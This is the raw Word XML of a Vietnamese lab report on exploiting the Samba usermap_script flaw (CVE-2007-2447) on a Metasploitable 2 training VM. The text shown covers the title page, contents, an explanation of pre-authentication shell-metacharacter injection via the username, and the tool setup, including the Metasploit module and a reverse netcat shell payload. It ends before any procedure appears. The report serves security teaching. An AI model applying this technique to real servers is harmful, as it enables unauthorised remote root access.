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E9718" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="00174668">
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61AC2015" w14:textId="1E38ACC6" w:rsidR="00174668" w:rsidRDefault="002708A8" w:rsidP="00203CB1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">BÁO CÁO </w:t>
      </w:r>
      <w:r w:rsidR="00203CB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2357A7C9" w14:textId="6738D23C" w:rsidR="00174668" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:before="200" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
      <w:r w:rsidR="002708A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TẤN CÔNG LỖ HỔNG SAMBA USERMAP_SCRIPT (CVE-2007-2447) Trên Metasploitable 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CCA1E8" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="00174668">
      <w:pPr>
        <w:spacing w:before="600"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7DB9DD" w14:textId="09E62815" w:rsidR="00174668" w:rsidRDefault="00174668">
      <w:pPr>
        <w:spacing w:before="1000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D9C70C3" w14:textId="559EDF73" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:before="1000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AEF2D39" w14:textId="73E1D08F" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:before="1000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="272ACC13" w14:textId="77777777" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:before="1000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4146DD" w14:textId="55484E72" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:before="1000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F6542A" w14:textId="7207A68C" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:before="1000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8D3A27" w14:textId="06FCB639" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:before="1000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E76A32" w14:textId="77777777" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:before="1000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28502BDA" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Hà Nội, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AF187F" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="00174668">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264B92DC" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>MỤC LỤC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4DC9C7" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>1. Mở đầu ................................................................................................. 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42B88E" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>2. Cơ sở lý thuyết – Lỗ hổng CVE-2007-2447 ............................</w:t>
      </w:r>
      <w:r>
        <w:t>............. 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAECA39" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   2.1. Tổng quan lỗ hổng .......................................................................... 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0590ADC0" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   2.2. Mức độ ảnh hưởng và rủi ro ........................................................... 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A664557" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   2.3. Cách khai thác .................</w:t>
      </w:r>
      <w:r>
        <w:t>............................................................... 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607EE2FC" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>3. Môi trường và công cụ thực nghiệm ..................................................... 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED6C937" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>4. Quy trình thực nghiệm .......................................................................... 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F243DC" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.1. Quét dịch vụ bằng Nmap ................................................................ 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39221295" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.2. Khai thác bằng Metasploit ......................</w:t>
      </w:r>
      <w:r>
        <w:t>....................................... 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2FB8CA" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.3. Xác minh quyền và post-exploitation ............................................. 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D11558" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>5. Phân tích pháp y (Forensics) ................................................................. 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102CA378" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>6. Giải pháp và biện p</w:t>
      </w:r>
      <w:r>
        <w:t>háp giảm thiểu ....................................................... 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B87E58C" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>7. Kết luận ............................................................................................... 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477DF31E" w14:textId="2FE3B02C" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Tài liệu tham khảo ......................................................</w:t>
      </w:r>
      <w:r>
        <w:t>............................. 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEA5576" w14:textId="54DD62A9" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C1EE295" w14:textId="57E74B43" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3F4113" w14:textId="18B059C9" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40712C5E" w14:textId="50BFDC67" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B77357B" w14:textId="574B9642" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D05572" w14:textId="186AA65F" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7D4794" w14:textId="372FD407" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E5F386" w14:textId="50BC337F" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F10647A" w14:textId="12EB9841" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733CB9B8" w14:textId="7BADCC50" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55841EA9" w14:textId="48990E23" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C03F44" w14:textId="1447D26C" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22602DFC" w14:textId="5ED0F197" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D10DEB" w14:textId="3F0F9E9A" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5544568E" w14:textId="39B972E8" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A7A08A6" w14:textId="56AA7E07" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B1B572" w14:textId="6D8ACD9F" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FF4C98" w14:textId="5D2A1233" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32090419" w14:textId="1EEF02A9" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5245BD20" w14:textId="58754326" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259DF06F" w14:textId="371D8DD1" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03D66D50" w14:textId="77777777" w:rsidR="00203CB1" w:rsidRDefault="00203CB1">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E495C6" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. MỞ ĐẦU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D529888" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Samba là phần mềm mã nguồn mở cung cấp dịch vụ chia sẻ file và máy in theo giao thức SMB/CIFS trên các hệ thống Unix/Linux. Lỗ hổng CVE-2007-2447 (usermap_script) là một trong những lỗ hổng nghiêm trọng ảnh hưởng đ</w:t>
      </w:r>
      <w:r>
        <w:t>ến các phiên bản Samba cũ, cho phép kẻ tấn công từ xa thực thi lệnh tùy ý mà không cần xác thực trong một số cấu hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B27DD0" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Báo cáo này trình bày quá trình thực nghiệm khai thác lỗ hổng Samba usermap_script (CVE-2007-2447) trên hệ thống Metasploitable 2 bằng Ka</w:t>
      </w:r>
      <w:r>
        <w:t>li Linux và Metasploit Framework, đồng thời phân tích pháp y và đề xuất biện pháp phòng thủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E915753" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Mục tiêu thực nghiệm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CFDEEC" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t>Hiểu bản chất và cơ chế hoạt động của lỗ hổng CVE-2007-2447.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A7E06B" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện khai thác thành công và chiếm quyền root trên máy mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68595D28" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện </w:t>
      </w:r>
      <w:r>
        <w:t>các lệnh post-exploitation để thu thập thông tin hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4757C423" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t>Phân tích pháp y từ log trên máy victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0C4F2E" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Rút ra các biện pháp giảm thiểu và phòng thủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4650BC" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. CƠ SỞ LÝ THUYẾT – LỖ HỔNG CVE-2007-2447</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2093F88B" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1. Tổng quan lỗ hổng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B2A178" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2007-2447 ảnh hưởng tới Samba các phiên bản từ 3.0.0 đến 3.0.25rc3. Bản chất lỗ hổng: Samba (thông qua thành phần smbd và các chức năng MS-RPC như SamrChangePassword, quản lý file share, in ấn từ xa…) không lọc đúng đầu vào người dùng mà truyền trực ti</w:t>
      </w:r>
      <w:r>
        <w:t>ếp vào shell /bin/sh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE9628B" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nếu server được cấu hình với tùy chọn “username map script” trong file smb.conf, kẻ tấn công có thể dùng ký tự shell (shell metacharacters) trong tên user để chèn và thực thi lệnh tùy ý. Đáng chú ý: khi “username map script” được bật,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> phần này chạy trước khi xác thực người dùng – nghĩa là không cần đăng nhập vẫn có thể khai thác được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76764230" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ngay cả khi không dùng username map script, các chức năng RPC khác (quản lý chia sẻ file/máy in) – nếu được gọi bởi người dùng đã xác thực – cũng có thể </w:t>
      </w:r>
      <w:r>
        <w:t>bị lợi dụng để thực thi lệnh shell tùy ý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D62785" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2. Mức độ ảnh hưởng và rủi ro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB6EB5C" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Lỗ hổng được đánh giá mức độ Medium (CVSS v2 = 6.0) theo các thông báo bảo mật thời điểm đó. Tuy nhiên, khi “username map script” được bật, kẻ tấn công từ xa không cần xác thực có th</w:t>
      </w:r>
      <w:r>
        <w:t>ể thực thi lệnh tùy ý với quyền của tiến trình smbd (thường là root hoặc nobody tùy cấu hình).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277024A8" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nếu server Samba chia sẻ file/máy in hoặc dùng chức năng RPC quản lý từ mạng, lỗ hổng rất dễ bị khai thác, dẫn tới nguy cơ root shell, chiếm quyền điều khiển server, rò rỉ dữ liệu, cài backdoor và lan sang hệ thống nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143AFACE" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3. Cách khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B46609" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Metasploit Fr</w:t>
      </w:r>
      <w:r>
        <w:t>amework cung cấp module sẵn: exploit/multi/samba/usermap_script. Khi cấu hình đúng (Samba 3.0.20–3.0.25rc3 và “username map script” bật), module cung cấp remote shell mà không cần xác thực. Ngoài ra có thể khai thác thủ công bằng cách gửi RPC với tên người</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dùng chứa lệnh shell (qua smbclient hoặc script tùy chỉnh).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB3FC2" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. MÔI TRƯỜNG VÀ CÔNG CỤ THỰC NGHIỆM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74668" w14:paraId="0E9A75C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7E89E32B" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Thành phần</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0ADCE5D4" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Hệ điều hành / IP</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5769BD92" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cấu hình mạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00174668" w14:paraId="5F58719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6A58180" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Máy tấn công</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2665F168" w14:textId="487BA1E4" w:rsidR="00174668" w:rsidRDefault="002708A8">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux – </w:t>
            </w:r>
            <w:r w:rsidR="005A15EB">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>attack ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2FEAD775" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Bridged Adapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00174668" w14:paraId="185CF69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Pr>
          <w:p w14:paraId="5F0A1EF1" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Máy mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2251FE23" w14:textId="4B8E5102" w:rsidR="00174668" w:rsidRDefault="002708A8">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable 2 – </w:t>
            </w:r>
            <w:r w:rsidR="005A15EB">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>victim ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E8F3E7C" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Bridged Adapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="416D972A" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:spacing w:before="160" w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Công cụ chính:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CED97" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap – quét cổng và nhận diện phiên bản Samba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364390B3" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Framework – module exploit/multi/samba/usermap_script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5912EA82" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Payload: cmd/unix/reverse_netcat (shell ngược).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BB6201" w14:textId="77777777" w:rsidR="00174668" w:rsidRDefault="002708A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. QUY TRÌNH THỰC NGHIỆM</w:t>
      </w:r>
    </w:p>
